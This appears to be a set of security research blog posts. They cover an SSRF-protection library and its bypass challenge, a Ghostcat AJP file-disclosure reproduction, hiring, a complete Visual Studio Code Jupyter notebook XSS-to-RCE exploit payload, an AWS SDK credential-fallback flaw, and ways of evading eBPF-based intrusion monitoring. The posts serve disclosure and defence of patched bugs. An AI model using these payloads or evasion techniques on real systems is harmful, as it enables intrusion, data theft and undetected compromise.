go get -u github.com/doyensec/safeurl

Usage

The safeurl.Client, provided by the library, can be used as a drop-in replacement of Go’s native net/http.Client.

The following code snippet shows a simple Go program that uses the safeurl library:

import (
    "fmt"
    "github.com/doyensec/safeurl"
)

func main() {
    config := safeurl.GetConfigBuilder().
        Build()

    client := safeurl.Client(config)

    resp, err := client.Get("https://example.com")
    if err != nil {
        fmt.Errorf("request return error: %v", err)
    }

    // read response body
}

The minimal library configuration looks something like:

config := GetConfigBuilder().Build()

Using this configuration you get:

allowed traffic only for ports 80 and 443
allowed traffic which uses HTTP or HTTPS protocols
blocked traffic to private IP addresses
blocked IPv6 traffic to any address
mitigation for DNS rebinding attacks

Configuration

The safeurl.Config is used to customize the safeurl.Client. The configuration can be used to set the following:

AllowedPorts            - list of ports the application can connect to
AllowedSchemes          - list of schemas the application can use
AllowedHosts            - list of hosts the application is allowed to communicate with
BlockedIPs              - list of IP addresses the application is not allowed to connect to
AllowedIPs              - list of IP addresses the application is allowed to connect to
AllowedCIDR             - list of CIDR range the application is allowed to connect to
BlockedCIDR             - list of CIDR range the application is not allowed to connect to
IsIPv6Enabled           - specifies whether communication through IPv6 is enabled
AllowSendingCredentials - specifies whether HTTP credentials should be sent
IsDebugLoggingEnabled   - enables debug logs

Being a wrapper around Go’s native net/http.Client, the library allows you to configure others standard settings as well, such as HTTP redirects, cookie jar settings and request timeouts. Please refer to the official docs for more information on the suggested configuration for production environments.

Configuration examples

To showcase how versatile safeurl.Client is, let us show you a few configuration examples.

It is possible to allow only a single schema:

GetConfigBuilder().
    SetAllowedSchemes("http").
    Build()

Or configure one or more allowed ports:

// This enables only port 8080. All others are blocked (80, 443 are blocked too)
GetConfigBuilder().
    SetAllowedPorts(8080).
    Build()

// This enables only port 8080, 443, 80
GetConfigBuilder().
    SetAllowedPorts(8080, 80, 443). 
    Build()

// **Incorrect.** This configuration will allow traffic to the last allowed port (443), and overwrite any that was set before
GetConfigBuilder().
    SetAllowedPorts(8080).
    SetAllowedPorts(80).
    SetAllowedPorts(443).
    Build()

This configuration allows traffic to only one host, example.com in this case:

GetConfigBuilder().
    SetAllowedHosts("example.com").
    Build()

Additionally, you can block specific IPs (IPv4 or IPv6):

GetConfigBuilder().
    SetBlockedIPs("1.2.3.4").
    Build()

Note that with the previous configuration, the safeurl.Client will block the IP 1.2.3.4 in addition to all IPs belonging to internal, private or reserved networks.

If you wish to allow traffic to an IP address, which the client blocks by default, you can use the following configuration:

GetConfigBuilder().
    SetAllowedIPs("10.10.100.101").
    Build()

It’s also possible to allow or block full CIDR ranges instead of single IPs:

GetConfigBuilder().
    EnableIPv6(true).
    SetBlockedIPsCIDR("34.210.62.0/25", "216.239.34.0/25", "2001:4860:4860::8888/32").
    Build()

DNS Rebinding mitigation

DNS rebinding attacks are possible due to a mismatch in the DNS responses between two (or more) consecutive HTTP requests. This vulnerability is a typical TOCTOU problem. At the time-of-check (TOC), the IP points to an allowed destination. However, at the time-of-use (TOU), it will point to a completely different IP address.

DNS rebinding protection in safeurl is accomplished by performing the allow/block list validations on the actual IP address which will be used to make the HTTP request. This is achieved by utilizing Go’s net/dialer package and the provided Control hook. As stated in the official documentation:

// If Control is not nil, it is called after creating the network
// connection but before actually dialing.
Control func(network, address string, c syscall.RawConn) error

In our safeurl implementation, the IPs validation happens inside the Control hook. The following snippet shows some of the checks being performed. If all of them pass, the HTTP dial occurs. In case a check fails, the HTTP request is dropped.

func buildRunFunc(wc *WrappedClient) func(network, address string, c syscall.RawConn) error {

return func(network, address string, _ syscall.RawConn) error {
	// [...]
	if wc.config.AllowedIPs == nil && isIPBlocked(ip, wc.config.BlockedIPs) {
		wc.log(fmt.Sprintf("ip: %v found in blocklist", ip))
		return &AllowedIPError{ip: ip.String()}
	}

	if !isIPAllowed(ip, wc.config.AllowedIPs) && isIPBlocked(ip, wc.config.BlockedIPs) {
		wc.log(fmt.Sprintf("ip: %v not found in allowlist", ip))
		return &AllowedIPError{ip: ip.String()}
	}

	return nil
}
}

Help Us Make `safeurl` Better (and Safer)

We’ve performed extensive testing during the library development. However, we would love to have others pick at our implementation.

“Given enough eyes, all bugs are shallow”. Hopefully.

Connect to http://164.92.85.153/ and attempt to catch the flag hosted on this internal (and unauthorized) URL: http://164.92.85.153/flag

The challenge was shut down on 01/13/2023. You can always run the challenge locally, by using the code snippet below.

This is the source code of the challenge endpoint, with the specific safeurl configuration:

func main() {
	cfg := safeurl.GetConfigBuilder().
		SetBlockedIPs("164.92.85.153").
		SetAllowedPorts(80, 443).
		Build()

	client := safeurl.Client(cfg)

	router := gin.Default()

	router.GET("/webhook", func(context *gin.Context) {
		urlFromUser := context.Query("url")
		if urlFromUser == "" {
			errorMessage := "Please provide an url. Example: /webhook?url=your-url.com\n"
			context.String(http.StatusBadRequest, errorMessage)
		} else {
			stringResponseMessage := "The server is checking the url: " + urlFromUser + "\n"

			resp, err := client.Get(urlFromUser)

			if err != nil {
				stringError := fmt.Errorf("request return error: %v", err)
				fmt.Print(stringError)
				context.String(http.StatusBadRequest, err.Error())
				return
			}

			defer resp.Body.Close()
			bodyString, err := io.ReadAll(resp.Body)

			if err != nil {
				context.String(http.StatusInternalServerError, err.Error())
				return
			}

			fmt.Print("Response from the server: " + stringResponseMessage)
			fmt.Print(resp)
			context.String(http.StatusOK, string(bodyString))
		}
	})

	router.GET("/flag", func(context *gin.Context) {
		ip := context.RemoteIP()
		nip := net.ParseIP(ip)
		if nip != nil {
			if nip.IsLoopback() {
				context.String(http.StatusOK, "You found the flag")
			} else {
				context.String(http.StatusForbidden, "")
			}
		} else {
			context.String(http.StatusInternalServerError, "")
		}
	})

	router.GET("/", func(context *gin.Context) {

		indexPage := "<!DOCTYPE html><html lang=\"en\"><head><title>SafeURL - challenge</title></head><body>...</body></html>"
		context.Writer.Header().Set("Content-Type", "text/html; charset=UTF-8")
		context.String(http.StatusOK, indexPage)
	})

	router.Run("127.0.0.1:8080")
}

If you are able to bypass the check enforced by the safeurl.Client, the content of the flag will give you further instructions on how to collect your reward. Please note that unintended ways of getting the flag (e.g., not bypassing safeurl.Client) are considered out of scope.

Feel free to contribute with pull requests, bug reports or enhancements ideas.

This tool was possible thanks to the 25% research time at Doyensec. Tune in again for new episodes.

Let's speak AJP

2022-11-15T00:00:00+01:00

Introduction

AJP (Apache JServ Protocol) is a binary protocol developed in 1997 with the goal of improving the performance of the traditional HTTP/1.1 protocol especially when proxying HTTP traffic between a web server and a J2EE container. It was originally created to manage efficiently the network throughput while forwarding requests from server A to server B.

A typical use case for this protocol is shown below:

During one of my recent research weeks at Doyensec, I studied and analyzed how this protocol works and its implementation within some popular web servers and Java containers. The research also aimed at reproducing the infamous Ghostcat (CVE-2020-1938) vulnerability discovered in Tomcat by Chaitin Tech researchers, and potential discovering other look-alike bugs.

Ghostcat

This vulnerability affected the AJP connector component of the Apache Tomcat Java servlet container, allowing malicious actors to perform local file inclusion from the application root directory. In some circumstances, this issue would allow attackers to perform arbitrary command execution. For more details about Ghostcat, please refer to the following blog post: https://hackmag.com/security/apache-tomcat-rce/

Communicating via AJP

Back in 2017, our own Luca Carettoni developed and released one of the first, if not the first, open source libraries implementing the Apache JServ Protocol version 1.3 (ajp13). With that, he also developed AJPFuzzer. Essentially, this is a rudimental fuzzer that makes it easy to send handcrafted AJP messages, run message mutations, test directory traversals and fuzz on arbitrary elements within the packet.

With minor tuning, AJPFuzzer can be also used to quickly reproduce the GhostCat vulnerability. In fact, we’ve successfully reproduced the attack by sending a crafted forwardrequest request including the javax.servlet.include.servlet_path and javax.servlet.include.path_info Java attributes, as shown below:

$ java -jar ajpfuzzer_v0.7.jar

$ AJPFuzzer> connect 192.168.80.131 8009
connect 192.168.80.131 8009
[*] Connecting to 192.168.80.131:8009
Connected to the remote AJP13 service

Once connected to the target host, send the malicious ForwardRequest packet message and verify the discosure of the test.xml file:

$ AJPFuzzer/192.168.80.131:8009> forwardrequest 2 "HTTP/1.1" "/" 127.0.0.1 192.168.80.131 192.168.80.131 8009 false "Cookie:test=value" "javax.servlet.include.path_info:/WEB-INF/test.xml,javax.servlet.include.servlet_path:/"


[*] Sending Test Case '(2) forwardrequest'
[*] 2022-10-13 23:02:45.648


... trimmed ...


[*] Received message type 'Send Body Chunk'
[*] Received message description 'Send a chunk of the body from the servlet container to the web server.
Content (HEX):
0x3C68656C6C6F3E646F79656E7365633C2F68656C6C6F3E0A
Content (Ascii):
<hello>doyensec</hello>
'
[*] 2022-10-13 23:02:46.859


00000000 41 42 00 1C 03 00 18 3C 68 65 6C 6C 6F 3E 64 6F AB.....<hello>do
00000010 79 65 6E 73 65 63 3C 2F 68 65 6C 6C 6F 3E 0A 00 yensec</hello>..


[*] Received message type 'End Response'
[*] Received message description 'Marks the end of the response (and thus the request-handling cycle). Reuse? Yes'
[*] 2022-10-13 23:02:46.86

The server AJP connector will receive an AJP message with the following structure:

The combination of libajp13, AJPFuzzer and the Wireshark AJP13 dissector made it easier to understand the protocol and play with it. For example, another noteworthy test case in AJPFuzzer is named genericfuzz. By using this command, it’s possible to perform fuzzing on arbitrary elements within the AJP request, such as the request attributes name/value, secret, cookies name/value, request URI path and much more:

$ AJPFuzzer> connect 192.168.80.131 8009
connect 192.168.80.131 8009
[*] Connecting to 192.168.80.131:8009
Connected to the remote AJP13 service

$ AJPFuzzer/192.168.80.131:8009> genericfuzz 2 "HTTP/1.1" "/" "127.0.0.1" "127.0.0.1" "127.0.0.1" 8009 false "Cookie:AAAA=BBBB" "secret:FUZZ" /tmp/listFUZZ.txt

Takeaways

Web binary protocols are fun to learn and reverse engineer.

For defenders:

Do not expose your AJP interfaces in hostile networks. Instead, consider switching to HTTP/2
Protect the AJP interface by enabling a shared secret. In this case, the workers must also include a matching value for the secret

Recruiting Security Researchers Remotely

2022-11-09T00:00:00+01:00

At Doyensec, the application security engineer recruitment process is 100% remote. As the final step, we used to organize an onsite interview in Warsaw for candidates from Europe and in New York for candidates from the US. It was like that until 2020, when the Covid pandemic forced us to switch to a 100% remote recruitment model and hire people without meeting them in person.

We have conducted recruitment interviews with candidates from over 25 countries. So how did we build a process that, on the one hand, is inclusive for people of different nationalities and cultures, and on the other hand, allows us to understand the technical skills of a given candidate?

The recruitment process below is the result of the experience gathered since 2018.

Introduction Call

Before we start the recruitment process of a given candidate, we want to get to know someone better. We want to understand their motivations for changing the workplace as well as what they want to do in the next few years. Doyensec only employs people with a specific mindset, so it is crucial for us to get to know someone before asking them to present their technical skills.

During our initial conversation, our HR specialist will tell a candidate more about the company, how we work, where our clients come from and the general principles of cooperation with us. We will also leave time for the candidate so that they can ask any questions they want.

What do we pay attention to during the introduction call?

Knowledge of the English language for applicants who are not native speakers
Professionalism - although people come from different cultures, professionalism is international
Professional experience that indicates the candidate has the background to be successful in the relevant role with us
General character traits that can tell us if someone will fit in well with our team

If the financial expectations of the candidate are in line with what we can offer and we feel good about the candidate, we will proceed to the first technical skills test.

Source Code Challenge

At Doyensec, we frequently deal with source code that is provided by our clients. We like to combine source code analysis with dynamic testing. We believe this combination will bring the highest ROI to our customers. This is why we require each candidate to be able to analyze application source code.

Our source code challenge is arranged such that, at the agreed time, we send an archive of source code to the candidate and ask them to find as many vulnerabilities as possible within 2 hours. They are also asked to prepare short descriptions of these vulnerabilities according to the instructions that we send along with the challenge. The aim of this assignment is to understand how well the candidate can analyze the source code and also how efficiently they can work under time pressure.

We do not reveal in advance what programming languages are in our tests, but they should expect the more popular ones. We don’t test on niche languages as our goal is to check if they are able to find vulnerabilities in real-world code, not to try to stump them with trivia or esoteric challenges.

We feel nothing beats real-world experience in coding and reviewing code for vulnerabilities. Beyond that, examples of the academic knowledge necessary to pass our code review challenge is similar (but not limited) to what you’d find in the following resources:

Technical Interview

After analyzing the results of the first challenge, we decide whether to invite the candidate to the first technical interview. The interview is usually conducted by our Consulting Director or one of the more experienced consultants.

The interview will last about 45 minutes where we will ask questions that will help us understand the candidates’ skillsets and determine their level of seniority. During this conversation, we will also ask about mistakes made during the source code challenge. We want to understand why someone may have reported a vulnerability when it is not there or perhaps why someone missed a particular, easy to detect vulnerability.

We also encourage candidates to ask questions about how we work, what tools and techniques we use and anything else that may interest the candidate.

The knowledge necessary to be successful in this phase of the process comes from real-world experience, coupled with academic knowledge from sources such as these:

Web Challenge

At four hours in length, our Web Challenge is our last and longest test of technical skills. At an agreed upon time, we send the candidate a link to a web application that contains a certain number of vulnerabilities and the candidate’s task is to find as many vulnerabilities as possible and prepare a simplified report. Unlike the previous technical challenge where we checked the ability to read the source code, this is a 100% blackbox test.

We recommend candidates to feel comfortable with topics similar to those covered at the Portswigger Web Security Academy, or the training/CTFs available through sites such as HackerOne, prior attempting this challenge.

If the candidate passes this stage of the recruitment process, they will only have one last stage, an interview with the founders of the company.

Final Interview

The last stage of recruitment isn’t so much an interview but rather, more of a summary of the entire process. We want to talk to the candidate about their strengths, better understand their technical weaknesses and any mistakes they made during the previous steps in the process. In particular, we always like to distinguish errors that come from the lack of knowledge versus the result of time pressure. It’s a very positive sign when candidates who reach this stage have reflected upon the process and taken steps to improve in any areas they felt less comfortable with.

The last interview is always carried out by one of the founders of the company, so it’s a great opportunity to learn more about Doyensec. If someone reaches this stage of the recruitment process, it is highly likely that our company will make them an offer. Our offers are based on their expectations as well as what value they bring to the organization. The entire recruitment process is meant to guarantee that the employee will be satisfied with the work and meet the high standards Doyensec has for its team.

The entire recruitment process takes about 8 hours of actual time, which is only one working day, total. So, if the candidate is reactive, the entire recruitment process can usually be completed in about 2 weeks or less.

If you are looking for more information about working @Doyensec, visit our career page and check out our job openings.

Visual Studio Code Jupyter Notebook RCE

2022-10-27T00:00:00+02:00

I spared a few hours over the past weekend to look into the exploitation of this Visual Studio Code .ipynb Jupyter Notebook bug discovered by Justin Steven in August 2021.

Justin discovered a Cross-Site Scripting (XSS) vulnerability affecting the VSCode built-in support for Jupyter Notebook (.ipynb) files.

{
  "cells": [
    {
      "cell_type": "code",
      "execution_count": null,
      "source": [],
      "outputs": [
        {
          "output_type": "display_data",
          "data": {"text/markdown": "<img src=x onerror='console.log(1)'>"}
        }
      ]
    }
  ]
}

His analysis details the issue and shows a proof of concept which reads arbitrary files from disk and then leaks their contents to a remote server, however it is not a complete RCE exploit.

I could not find a way to leverage this XSS primitive to achieve arbitrary code execution, but someone more skilled with Electron exploitation may be able to do so. […]

Given our focus on ElectronJs (and many other web technologies), I decided to look into potential exploitation venues.

As the first step, I took a look at the overall design of the application in order to identify the configuration of each BrowserWindow/BrowserView/Webview in use by VScode. Facilitated by ElectroNG, it is possible to observe that the application uses a single BrowserWindow with nodeIntegration:on.

This BrowserWindow loads content using the vscode-file protocol, which is similar to the file protocol. Unfortunately, our injection occurs in a nested sandboxed iframe as shown in the following diagram:

In particular, our sandbox iframe is created using the following attributes:

allow-scripts allow-same-origin allow-forms allow-pointer-lock allow-downloads

By default, sandbox makes the browser treat the iframe as if it was coming from another origin, even if its src points to the same site. Thanks to the allow-same-origin attribute, this limitation is lifted. As long as the content loaded within the webview is also hosted on the local filesystem (within the app folder), we can access the top window. With that, we can simply execute code using something like top.require('child_process').exec('open /System/Applications/Calculator.app');

So, how do we place our arbitrary HTML/JS content within the application install folder?

Alternatively, can we reference resources outside that folder?

The answer comes from a recent presentation I watched at the latest Black Hat USA 2022 briefings. In exploiting CVE-2021-43908, TheGrandPew and s1r1us use a path traversal to load arbitrary files outside of VSCode installation path.

vscode-file://vscode-app/Applications/Visual Studio Code.app/Contents/Resources/app/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F/somefile.html

Similarly to their exploit, we can attempt to leverage a postMessage’s reply to leak the path of current user directory. In fact, our payload can be placed inside the malicious repository, together with the Jupyter Notebook file that triggers the XSS.

After a couple of hours of trial-and-error, I discovered that we can obtain a reference of the img tag triggering the XSS by forcing the execution during the onload event.

With that, all of the ingredients are ready and I can finally assemble the final exploit.

var apploc = '/Applications/Visual Studio Code.app/Contents/Resources/app/'.replace(/ /g, '%20');
var repoloc;
window.top.frames[0].onmessage = event => {
    if(event.data.args.contents && event.data.args.contents.includes('<base href')){  
        var leakloc = event.data.args.contents.match('<base href=\"(.*)\"')[1];
        var repoloc = leakloc.replace('https://file%2B.vscode-resource.vscode-webview.net','vscode-file://vscode-app'+apploc+'..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..');
        setTimeout(async()=>console.log(repoloc+'poc.html'), 3000)
        location.href=repoloc+'poc.html';
    }
};
window.top.postMessage({target: window.location.href.split('/')[2],channel: 'do-reload'}, '*');

To deliver this payload inside the .ipynb file we still need to overcome one last limitation: the current implementation results in a malformed JSON. The injection happens within a JSON file (double-quoted) and our Javascript payload contains quoted strings as well as double-quotes used as a delimiter for the regular expression that is extracting the path.

After a bit of tinkering, the easiest solution involves the backtick ` character instead of the quote for all JS strings.

The final pocimg.ipynb file looks like:

{
  "cells": [
    {
      "cell_type": "code",
      "execution_count": null,
      "source": [],
      "outputs": [
        {
          "output_type": "display_data",
          "data": {"text/markdown": "<img src='a445fff1d9fd4f3fb97b75202282c992.png' onload='var apploc = `/Applications/Visual Studio Code.app/Contents/Resources/app/`.replace(/ /g, `%20`);var repoloc;window.top.frames[0].onmessage = event => {if(event.data.args.contents && event.data.args.contents.includes(`<base href`)){var leakloc = event.data.args.contents.match(`<base href=\"(.*)\"`)[1];var repoloc = leakloc.replace(`https://file%2B.vscode-resource.vscode-webview.net`,`vscode-file://vscode-app`+apploc+`..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..`);setTimeout(async()=>console.log(repoloc+`poc.html`), 3000);location.href=repoloc+`poc.html`;}};window.top.postMessage({target: window.location.href.split(`/`)[2],channel: `do-reload`}, `*`);'>"}
        }
      ]
    }
  ]
}

By opening a malicious repository with this file, we can finally trigger our code execution.

The built-in Jupyter Notebook extension opts out of the protections given by the Workspace Trust feature introduced in Visual Studio Code 1.57, hence no further user interaction is required. For the record, this issue was fixed in VScode 1.59.1 and Microsoft assigned CVE-2021-26437 to it.

The Danger of Falling to System Role in AWS SDK Client

2022-10-18T00:00:00+02:00

Introduction to the series

When it comes to Cloud Security, the first questions usually asked are:

How is the infrastructure configured?
Are there any public buckets?
Are the VPC networks isolated?
Does it use proper IAM settings?

As application security engineers, we think that there are more interesting and context-related questions such as:

Which services provided by the cloud vendor are used?
Among the used services, which ones are directly integrated within the web platform logic?
How is the web application using such services?
How are they combined to support the internal logic?
Is the usage of services ever exposed or reachable by the end-user?
Are there any unintended behaviors caused by cloud services within the web platform?

By answering these questions, we usually find bugs.

Today we introduce the “CloudSecTidbits” series to share ideas and knowledge about such questions.

CloudSec Tidbits is a blogpost series showcasing interesting bugs found by Doyensec during cloud security testing activities. We’ll focus on times when the cloud infrastructure is properly configured, but the web application fails to use the services correctly.

Each blogpost will discuss a specific vulnerability resulting from an insecure combination of web and cloud related technologies. Every article will include an Infrastructure as Code (IaC) laboratory that can be easily deployed to experiment with the described vulnerability.

Tidbit # 1 - The Danger of Falling to System Role in AWS SDK Client

Amazon Web Services offers a comprehensive SDK to interact with their cloud services.

Let’s first examine how credentials are configured. The AWS SDKs require users to pass access / secret keys in order to authenticate requests to AWS. Credentials can be specified in different ways, depending on the different use cases.

When the AWS client is initialized without directly providing the credential’s source, the AWS SDK acts using a clearly defined logic. The AWS SDK uses a different credential provider chain depending on the base language. The credential provider chain is an ordered list of sources where the AWS SDK will attempt to fetch credentials from. The first provider in the chain that returns credentials without an error will be used.

For example, the SDK for the Go language will use the following chain:

1) Environment variables
2) Shared credentials file
3) If the application uses ECS task definition or RunTask API operation, IAM role for tasks
4) If the application is running on an Amazon EC2 instance, IAM role for Amazon EC2

The code snippet below shows how the SDK retrieves the first valid credential provider:

Source: aws-sdk-go/aws/credentials/chain_provider.go

// Retrieve returns the credentials value or error if no provider returned
// without error.
//
// If a provider is found it will be cached and any calls to IsExpired()
// will return the expired state of the cached provider.
func (c *ChainProvider) Retrieve() (Value, error) {
	var errs []error
	for _, p := range c.Providers {
		creds, err := p.Retrieve()
		if err == nil {
			c.curr = p
			return creds, nil
		}
		errs = append(errs, err)
	}
	c.curr = nil

	var err error
	err = ErrNoValidProvidersFoundInChain
	if c.VerboseErrors {
		err = awserr.NewBatchError("NoCredentialProviders", "no valid providers in chain", errs)
	}
	return Value{}, err
}

After that first look at AWS SDK credentials, we can jump straight to the tidbit case.

Insecure AWS SDK Client Initialization In User Facing Functionalities - The Import From S3 Case

By testing several web platforms, we noticed that data import from external cloud services is an often recurring functionality. For example, some web platforms allow data import from third-party cloud storage services (e.g., AWS S3).

In this specific case, we will focus on a vulnerability identified in a web application that was using the AWS SDK for Go (v1) to implement an “Import Data From S3” functionality.

The user was able to make the platform fetch data from S3 by providing the following inputs:

S3 bucket name - Import from public source case;

OR
S3 bucket name + AWS Credentials - Import from private source case;

The code paths were handled by a function similar to the following structure:

func getObjectsList(session *Session, config *aws.Config, bucket_name string){

	//initilize or re-initilize the S3 client
	S3svc := s3.New(session, config)

	objectsList, err := S3svc.ListObjectsV2(&s3.ListObjectsV2Input{
			Bucket:  bucket_name
	})

	return objectsList, err
}

func importData(req *http.Request) (success bool) {

	srcConfig := &aws.Config{
		Region: &config.Config.AWS.Region,
	}

	req.ParseForm()
	bucket_name := req.Form.Get("bucket_name")
	accessKey := req.Form.Get("access_key")
	secretKey := req.Form.Get("secret_key")
	region := req.Form.Get("region")

	session_init, err := session.NewSession()
	if err != nil {
		return err, nil
	}

	aws_config = &aws.Config{
		Region: region,
	}

	if len(accessKey) > 0 {
		aws_config.Credentials = credentials.NewStaticCredentials(accessKey, secretKey, "")
	} else {
		aws_config.Credentials = credentials.AnonymousCredentials
	}

	objectList, err := getObjectsList(session_init, aws_config, bucket_name)
    
...

Despite using credentials.AnonymousCredentials when the user was not providing keys, the function had an interesting code path when ListObjectsV2 returned errors:

...
if err != nil {
		if err, awsError := err.(awserr.Error); awsError {
			aws_config.credentials = nil
			getObjectsList(session_init, aws_config, bucket_name)
		}
}

The error handling was setting aws_config.credentials = nil and trying again to list the objects in the bucket.

Looking at aws_config.credentials = nil

Under those circumstances, the credentials provider chain will be used and eventually the instance’s IAM role will be assumed. In our case, the automatically retrieved credentials had full access to internal S3 buckets.

The Simple Deduction

If internal S3 bucket names are exposed to the end-user by the platform (e.g., via network traffic), the user can use them as input for the “import from S3” functionality and inspect their content directly in the UI.

Reading internal bucket names list extracted from Burp Suite history

In fact, it is not uncommon to see internal bucket names in an application’s traffic as they are often used for internal data processing. In conclusion, providing internal bucket names resulted in them being fetched from the import functionality and added to the platform user’s data.

Different Client Credentials Initialization, Different Outcomes

AWS SDK clients require a Session object containing a Credential object for the initialization.

Described below are the three main ways to set the credentials needed by the client:

NewStaticCredentials

Within the credentials package, the NewStaticCredentials function returns a pointer to a new Credentials object wrapping static credentials.

Client initialization example with NewStaticCredentials:

package testing

import (
	"time"

	"github.com/aws/aws-sdk-go/aws"
	"github.com/aws/aws-sdk-go/aws/credentials"
	"github.com/aws/aws-sdk-go/aws/session"
)

var session = session.Must(session.NewSession(&aws.Config{
	Credentials: credentials.NewStaticCredentials("AKIA….", "Secret", "Session"),
	Region:      aws.String("us-east-1"),
}))

Note: The credentials should not be hardcoded in code. Instead retrieve them from a secure vault at runtime.

{ nil | Unspecified } Credentials Object

If the session client is initialized without specifying a credential object, the credential provider chain will be used. Likewise, if the Credentials object is directly initialized to nil, the same behavior will occur.

Client initialization example without Credential object:

svc := s3.New(session.Must(session.NewSession(&aws.Config{
		Region:      aws.String("us-west-2"),
})))

Client initialization example with a nil valued Credential object:

svc := s3.New(session.Must(session.NewSession(&aws.Config{
		Credentials: <nil_object>,
		Region:      aws.String("us-west-2"),
})))

Outcome: Both initialization methods will result in relying on the credential provider chain. Hence, the credentials (probably very privileged) retrieved from the chain will be used. As shown in the aforementioned “Import From S3” case study, not being aware of such behavior led to the exfiltration of internal buckets.

AnonymousCredentials

The right function for the right tasks ;)

AWS SDK for Go API Reference is here to help:

“AnonymousCredentials is an empty Credential object that can be used as dummy placeholder credentials for requests that do not need to be signed. This AnonymousCredentials object can be used to configure a service not to sign requests when making service API calls. For example, when accessing public S3 buckets.”

svc := s3.New(session.Must(session.NewSession(&aws.Config{
  Credentials: credentials.AnonymousCredentials,
})))
// Access public S3 buckets.

Basically, the AnonymousCredentials object is just an empty Credential object:

// source: https://github.com/aws/aws-sdk-go/blob/main/aws/credentials/credentials.go#L60

// AnonymousCredentials is an empty Credential object that can be used as
// dummy placeholder credentials for requests that do not need to be signed.
//
// These Credentials can be used to configure a service not to sign requests
// when making service API calls. For example, when accessing public
// s3 buckets.
//
//     svc := s3.New(session.Must(session.NewSession(&aws.Config{
//       Credentials: credentials.AnonymousCredentials,
//     })))
//     // Access public S3 buckets.
var AnonymousCredentials = NewStaticCredentials("", "", "")

For cloud security auditors

The vulnerability could be also found in the usage of other AWS services.

While auditing cloud-driven web platforms, look for every code path involving an AWS SDK client initialization.

For every code path answer the following questions:

Is the code path directly reachable from an end-user input point (feature or exposed API)?

e.g., AWS credentials taken from the user settings page within the platform or a user submits an AWS public resource to have it fetched/modified by the platform.
How are the client’s credentials initialized?
- credential provider chain - Look for the machine owned role in the chain
  - Is there a fall-back condition? Look if the end-user can reach that code path with some inputs. If it is used by default, go on - Look for the role’s permissions
- aws.Config structure as input parameter - Look for the passed role’s permissions
Can users abuse the functionality to make the platform use the privileged credentials on their behalf and point to private resources within the AWS account?

e.g., “import from S3” functionality abused to import the infrastructure’s private buckets

For developers

Use the AnonymousAWSCredentials to configure the AWS SDK client when dealing with public resources.

From the official AWS documentations:

Using anonymous credentials will result in requests not being signed before sending them to the service. Any service that does not accept unsigned requests will return a service exception in this case.

In case of user provided credentials being used to integrate with other cloud services, the platform should avoid implementing fall-back to system role patterns. Ensure that the user provided credentials are correctly set to avoid ending up with aws.Config.Credentials = nil because it would result in the client using the credentials provider chain → System role.

Hands-On IaC Lab

Stay tuned for the next episode!

On Bypassing eBPF Security Monitoring

2022-10-11T00:00:00+02:00

There are many security solutions available today that rely on the Extended Berkeley Packet Filter (eBPF) features of the Linux kernel to monitor kernel functions. Such a paradigm shift in the latest monitoring technologies is being driven by a variety of reasons. Some of them are motivated by performance needs in an increasingly cloud-dominated world, among others. The Linux kernel always had kernel tracing capabilities such as kprobes (2.6.9), ftrace (2.6.27 and later), perf (2.6.31), or uprobes (3.5), but with BPF it’s finally possible to run kernel-level programs on events and consequently modify the state of the system, without needing to write a kernel module. This has dramatic implications for any attacker looking to compromise a system and go undetected, opening new areas of research and application. Nowadays, eBFP-based programs are used for DDoS mitigations, intrusion detection, container security, and general observability.

In 2021 Teleport introduced a new feature called Enhanced Session Recording to close some monitoring gaps in Teleport’s audit abilities. All issues reported have been promptly fixed, mitigated or documented as described in their public Q4 2021 report. Below you can see an illustration of how we managed to bypass eBPF-based controls, along with some ideas on how red teams or malicious actors could evade these new intrusion detection mechanisms. These techniques can be generally applied to other targets while attempting to bypass any security monitoring solution based on eBPF:

A few words on how eBPF works
Common shortcomings & potential bypasses (here be dragons)

A few words on how eBPF works

Extended BPF programs are written in a high-level language and compiled into eBPF bytecode using a toolchain. A user mode application loads the bytecode into the kernel using the bpf() syscall, where the eBPF verifier will perform a number of checks to ensure the program is “safe” to run in the kernel. This verification step is critical — eBPF exposes a path for unprivileged users to execute in ring 0. Since allowing unprivileged users to run code in the kernel is a ripe attack surface, several pieces of research in the past focused on local privilege exploitations (LPE), which we won’t cover in this blog post. After the program is loaded, the user mode application attaches the program to a hook point that will trigger the execution when a certain hook point (event) is hit (occurs). The program can also be JIT compiled into native assembly instructions in some cases. User mode applications can interact with, and get data from, the eBPF program running in the kernel using eBPF maps and eBPF helper functions.

Common shortcomings & potential bypasses (here be dragons)

1. Understand which events are caught

While eBPF is fast (much faster than auditd), there are plenty of interesting areas that can’t be reasonably instrumented with BPF due to performance reasons. Depending on what the security monitoring solution wants to protect the most (e.g., network communication vs executions vs filesystem operations), there could be areas where excessive probing could lead to a performance overhead pushing the development team to ignore them. This depends on how the endpoint agent is designed and implemented, so carefully auditing the code security of the eBPF program is paramount.

1.1 Execution bypasses

By way of example, a simple monitoring solution could decide to hook only the execve system call. Contrary to popular belief, multiple ELF-based Unix-like kernels don’t need a file on disk to load and run code, even if they usually require one. One way to achieve this is by using a technique called reflective loading. Reflective loading is an important post-exploitation technique usually used to avoid detection and execute more complex tools in locked-down environments. The man page for execve() states: “execve() executes the program pointed to by filename…”, and goes on to say that “the text, data, bss, and stack of the calling process are overwritten by that of the program loaded”. This overwriting doesn’t necessarily constitute something that the Linux kernel must have a monopoly over, unlike filesystem access, or any number of other things. Because of this, the execve() system call can be mimicked in userland with a minimal difficulty. Creating a new process image is therefore a simple matter of:

cleaning out the address space;
checking for, and loading, the dynamic linker;
loading the binary;
initializing the stack;
determining the entry point and
transferring control of execution.

By following these six steps, a new process image can be created and run. Since this technique was initially reported in 2004, the process has nowadays been pioneered and streamlined by OTS post-exploitation tools. As anticipated, an eBPF program hooking execve would not be able to catch this, since this custom userland exec would effectively replace the existing process image within the current address space with a new one. In this, userland exec mimics the behavior of the system call execve(). However, because it operates in userland, the kernel process structures which describe the process image remain unchanged.

Other system calls may go unmonitored and decrease the detection capabilities of the monitoring solution. Some of these are clone, fork, vfork, creat, or execveat.

Another potential bypass may be present if the BPF program is naive and trusts the execve syscall argument referencing the complete path of the file that is being executed. An attacker could create symbolic links of Unix binaries in different locations and execute them - thus tampering with the logs.

1.2 Network bypasses

